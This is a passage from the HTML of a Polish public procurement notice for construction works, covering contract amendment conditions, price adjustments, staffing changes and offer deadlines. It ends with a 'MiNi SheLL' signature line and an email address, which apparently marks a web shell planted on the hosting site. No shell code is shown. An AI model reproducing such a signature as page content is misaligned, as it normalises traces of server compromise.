nieprzewidzianymi w SIWZ, STWiORB, Dokumentacji projektowejwarunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypałyi niewybuchy, wykopaliska archeologiczne, 11)wystąpienia odmiennych od przyjętych w STWIORBoraz SIWZ warunków geologicznych, ale istotnych dla realizacji przedmiotu umowy, 12)wystąpieniaodmiennych (ale istotnych dla realizacji przedmiotu umowy) od przyjętych w STWIORB oraz SIWZwarunków terenowych, w szczególności istnienie niezinwentaryzowanych lub błędniezinwentaryzowanych obiektów budowlanych, 13)w przypadku zmiany technologii jakości lubparametrów charakterystycznych dla danego elementu, wprowadzanych na wniosek Wykonawcy lubZamawiającego, 14)w przypadku wystąpienia robót zamiennych, o których mowa w §15 niniejszejUmowy 15)w przypadku konieczności wykonania dodatkowych badań i ekspertyz, analiz itp.,3.Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez zmianęsposobu wykonania przedmiotu Umowy, zmianę wynagrodzenia Wykonawcy lub poprzezprzedłużenie Terminu zakończenia robót w przypadku: 1)zmiany przedmiotu zamówienia wprzypadku wystąpienia robót zamiennych, o których mowa w §15 niniejszej umowy. 2)koniecznościzrealizowania jakiejkolwiek części robót, objętych przedmiotem Umowy, przy zastosowaniuodmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacjiprojektowej, a wynikających ze stwierdzonych wad tej Dokumentacji lub zmiany stanu prawnego woparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziłoniewykonaniem lub wykonaniem nienależytym przedmiotu Umowy 3)odbiegających w sposób istotnyod przyjętych w Dokumentacji projektowej warunków geologicznych, geotechnicznych lubhydrologicznych, rozpoznania terenu w zakresie znalezisk archeologicznych, występowanianiewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeńniewykonaniem lub nienależytym wykonaniem przedmiotu Umowy 4)odbiegających w sposób istotnyod przyjętych w Dokumentacji projektowej warunków Terenu budowy, w szczególności napotkanianie zinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektówbudowlanych, 5)konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązańtechnicznych lub materiałowych ze względu na zmiany obowiązującego prawa, 6)zaistnienia innychistotnych okoliczności prawnych lub technicznych, skutkujących niemożliwością wykonania lubnależytego wykonania Umowy zgodnie z jej postanowieniami, 7)Zamawiający przewiduje możliwościzmiany - poprzez zawarcie aneksu do niniejszej umowy, wysokości wynagrodzenia brutto należnegoWykonawcy z tytułu realizacji niniejszej umowy w następujących przypadkach i w następującysposób: a)W przypadku ustawowej zmiany stawki VAT (zwiększenia lub zmniejszenia) wartości nettoz oferty Wykonawcy pozostaną bez zmian, a kwota wynagrodzenia brutto Wykonawcy, zostaniewyliczona na podstawie nowych przepisów z uwzględnieniem stopnia wykonania zamówieniawykonania zamówienia. W takim przypadku Wykonawca składa pisemny wniosek o zmianę umowy ozamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po wejściu w życieprzepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawieraćwyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzeniaWykonawcy po zmianie umowy. b)w przypadku zmiany wysokości minimalnego wynagrodzenia zapracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnymwynagrodzeniu za pracę kwota wynagrodzenia Wykonawcy ulegnie zmianie o wartość wzrostucałkowitego kosztu Wykonawcy, wynikającego ze zwiększenia wynagrodzeń osób bezpośredniowykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, zuwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnegowynagrodzenia; c) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lububezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotnekwota wynagrodzenia Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztuWykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przyzachowaniu dotychczasowej kwoty netto wynagrodzenia bezpośrednio wykonujących zamówienie narzecz Zamawiającego. d)Zmiana wynagrodzenia Wykonawcy, o której mowa w ust. 3 pkt 7)następować będzie na wniosek Wykonawcy. Do wniosku o zmianę wynagrodzenia w przypadkach, októrych mowa w ust. 3 pkt 7 lit. a)-c) Wykonawca zobowiązany jest dołączyć dokumentypotwierdzające zasadność złożenia takiego wniosku wraz z wykazaniem ponad wszelką wątpliwość, żezaistniała zmiana ma bezpośredni wpływ na koszty wykonywania zamówienia oraz określeniemstopnia w jakim wpłynie ona na wysokość wynagrodzenia wraz z dokładnym wyliczeniem kwotywynagrodzenia Wykonawcy po zmianie umowy. e)Wykonawca wystąpi z wnioskiem o zmianę kwotywynagrodzenia z co najmniej 30 dniowym wyprzedzeniem wobec wnioskowanej daty obowiązywanianowego wynagrodzenia. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne.f)Zmiana wynagrodzenia wykonawcy może mieć miejsce wyłącznie wtedy, gdy zmiany, o którychmowa w ust.3 pkt 7) będą mieć wpływ na koszt wykonania zamówienia przez wykonawcę.g)Zamawiający po zaakceptowaniu wniosku o którym mowa w ust.3 pkt 7) niniejszego paragrafu,wyznaczy datę podpisania aneksu h)Zmiana umowy skutkuje zmianą wynagrodzenia jedynie wzakresie płatności realizowanych po dacie zawarcia aneksu do umowy 8)wystąpienia zmianpowszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotuumowy, 9)poprawy parametrów technicznych, jakości, sprawności, wydajności lub innych parametrówcharakterystycznych dla danego elementu robót budowlanych, dostaw, 10)zmiany producentaurządzeń lub wyposażenia, w przypadku, gdy zmiana producenta urządzeń i wyposażenia będziekorzystna dla Zamawiającego oraz spowoduje poprawę parametrów technicznych, jakości, sprawności,wydajności lub innych parametrów charakterystycznych dla danego urządzenia lub wyposażenia,11)wycofania z produkcji określonego rodzaju przedmiotu zamówienia, niedostępności na rynkuMateriałów lub urządzeń wskazanych w Dokumentacji projektowej lub STWiORB, spowodowanazaprzestaniem produkcji lub wycofaniem z rynku tych Materiałów lub urządzeń, 12)wyniknięciarozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w innysposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celujednoznacznej interpretacji jej zapisów przez Strony. 13)zmiany osób odpowiedzialnych za nadzór nadrealizacją przedmiotu Umowy. Zmiana którejkolwiek z osób w trakcie realizacji przedmiotu niniejszejUmowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowaniaprzez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożeniapropozycji i wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lubwyższe od kwalifikacji i doświadczenia osób wymaganego postanowieniami Specyfikacji IstotnychWarunków Zamówienia. Przerwa w wykonywaniu Umowy wynikająca z braku personelu Wykonawcybędzie traktowana jako przyczyna zależna od Wykonawcy i nie może stanowić podstawy doprzedłużenia Terminu wykonania robót 14)wystąpienia oczywistych omyłek pisarskich irachunkowych w treści umowy. 15)Wystąpienia konieczności zmian osób Wykonawcy w przypadku,gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawcaobowiązany jest dokonać zmiany tych osób na inne spełniające na dzień składania ofert warunkiokreślone w SIWZ w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przezzamawiającego. 16)Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o której mowaw pkt.15 nie później niż 7 dni przed planowanym skierowaniem do kierowania budową/robotamiktórejkolwiek osoby. Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z brakukierownictwa budowy/robót będzie traktowana jako przerwa wynikła z przyczyn zależnych odWykonawcy i nie może stanowić podstawy do zmiany Terminu zakończenia robót. 17)Zaakceptowanaprzez Zamawiającego zmiana którejkolwiek z osób, o których mowa w pkt.15) winna być dokonawpisem do Dziennika budowy. 18)Ograniczenie zakresu robót wynikające z wprowadzenia zmianistotnych lub nieistotnych w rozumieniu Prawa budowlanego w Dokumentacji projektowej, którewynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotuzamówienia tym samym zmniejszenia wynagrodzenia, o którym mowa w §9 ust. 1 niniejszej umowy.19)Z zastrzeżeniem przypadku, w którym Zamawiający nałożył obowiązek osobistego wykonaniaprzez Wykonawcę kluczowych części zamówienia na roboty budowlane w SIWZ, Wykonawca może:a)powierzyć realizację części zamówienia Podwykonawcom, mimo nie wskazania w ofercie takiejczęści do powierzenia podwykonawcom; b)wskazać inny zakres Podwykonawstwa, niż przedstawionyw Ofercie; c)zrezygnować z Podwykonawstwa, d)wskazać innych Podwykonawców niż przedstawieniw Ofercie 20)Zmiany podwykonawcy lub rezygnacji z podwykonawcy podmiotu, na którego zasobyWykonawca powoływał się, na zasadach określonych w art.22a ust.1 ustawy Pzp, w celu wykazaniaspełniania warunków udziału w postępowaniu, wówczas Wykonawca zobowiązany jest wykazaćZamawiającemu, że proponowanych inny Podwykonawca lub wykonawca samodzielnie spełnia je wstopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakciepostępowania o udzielenie zamówienia, który będzie podmiotem udostępniającym zasoby niezbędnedo realizacji zamówienia. W takim przypadku wykonawca jest zobowiązany zaproponować innegopodwykonawcę spełniającego warunki określone przez zamawiającego w specyfikacji wrazz załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych §VI i VII specyfikacjiistotnych warunków zamówienia 21)W przypadkach określonych w art. 144 ust 1 pkt 3) - 6) ustawyPzp 4.W przedstawionych w ust. 2 pkt.1)-15) przypadkach wystąpienia opóźnień, strony ustalą noweTerminy, z tym, że maksymalny okres przesunięcia Terminu zakończenia realizacji przedmiotuUmowy równy będzie okresowi przerwy lub przestoju. Przesunięcie terminu będzie musiało byćszczegółowo uzasadnione przez Wykonawcę i zaakceptowane przez Zamawiającego, z wyjątkiemzaistnienia okoliczności, o których mowa w ust. 2 pkt.1). 5.Jeżeli z jakiejkolwiek przyczyny, która nieuprawnia Wykonawcy do przedłużenia terminu wykonania robót lub ich części, tempo robót wedługZamawiającego nie pozwoli na terminowe ich zakończenie, Zamawiający może polecić Wykonawcypodjęcie działań dla przyspieszenia tempa robót. Wszystkie koszty związane z podjętymi działaniamiobciążają Wykonawcę. 6.Zamawiający ma możliwość przedłużenia Terminu realizacji niniejszejumowy z przyczyn nieleżących po stronie Wykonawcy. 7.Zamawiający jest uprawniony do żądaniazmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy w związku zezmianami zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmianamiwytycznych dotyczących realizacji projektu. 8.Jeżeli Wykonawca uważa się za uprawnionego doprzedłużenia Terminu zakończenia robót na podstawie ust.2, zmiany Umowy w zakresie Materiałów,parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonaniaprzedmiotu Umowy na podstawie ust.3 i §15 Umowy lub zmiany Umowy na innej podstawiewskazanej w niniejszej Umowie, zobowiązany jest do przekazania Inspektorowi NadzoruInwestorskiego wniosku dotyczącego zmiany Umowy wraz z opisem zdarzenia lub okolicznościstanowiących podstawę do żądania takiej zmiany. 9.Wniosek, o którym mowa w ust.8 powinien zostaćprzekazany niezwłocznie, jednakże nie później niż w terminie 20 dni roboczych od dnia, w którymWykonawca dowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach.10.Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem, o którym mowa w ust.8,wszelkich innych dokumentów wymaganych Umową i informacji uzasadniających żądanie zmianyUmowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.11.Wykonawca zobowiązany jest do bieżącej dokumentacji koniecznej dla uzasadnienia żądaniazmiany i przechowywania jej na Terenie budowy lub w innym miejscu wskazanym przez InspektoraNadzoru Inwestorskiego lub Zamawiającego. 12.Po otrzymaniu wniosku, o którym mowa w ust. 8,Inspektor Nadzoru Inwestorskiego jest uprawniony, bez dokonywania oceny jego zasadności, dokontroli dokumentacji, o której mowa w ust.11. i wydania Wykonawcy polecenia prowadzenia dalszejdokumentacji bieżącej uzasadniającej żądanie zmiany. 13.Wykonawca jest zobowiązany do okazaniado wglądu Inspektorowi Nadzoru Inwestorskiego dokumentacji, o której mowa w ust.11 i przedłożeniana żądanie Inspektora Nadzoru Inwestorskiego jej kopii. 14.W terminie 5 dni roboczych od dniaotrzymania wniosku, o którym mowa w ust. 8 wraz z informacjami uzasadniającymi żądanie zmianyUmowy, Inspektor Nadzoru Inwestorskiego zobowiązany jest do pisemnego ustosunkowania się dozgłoszonego żądania zmiany Umowy, i przekazania go Zamawiającemu wraz z uzasadnieniem,zarówno w przypadku odmowy, jak i akceptacji żądania zmiany. 15.W terminie 5 dni roboczych oddnia otrzymania żądania zmiany, zaopiniowanego przez Inspektora Nadzoru Inwestorskiego,Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany Umowy i terminie podpisaniaaneksu do Umowy lub odpowiednio o braku akceptacji zmiany. 16.Nie stanowią zmiany umowy wrozumieniu art. 144 ust. 1 Pzp następujące zmiany: 1)danych związanych z obsługą administracyjnoorganizacyjnąUmowy, w szczególności zmiana numeru rachunku bankowego, 2)danych teleadresowych, 3)danych rejestrowych, 4)będące następstwem sukcesji uniwersalnej po jednej zestron Umowy</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-12-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com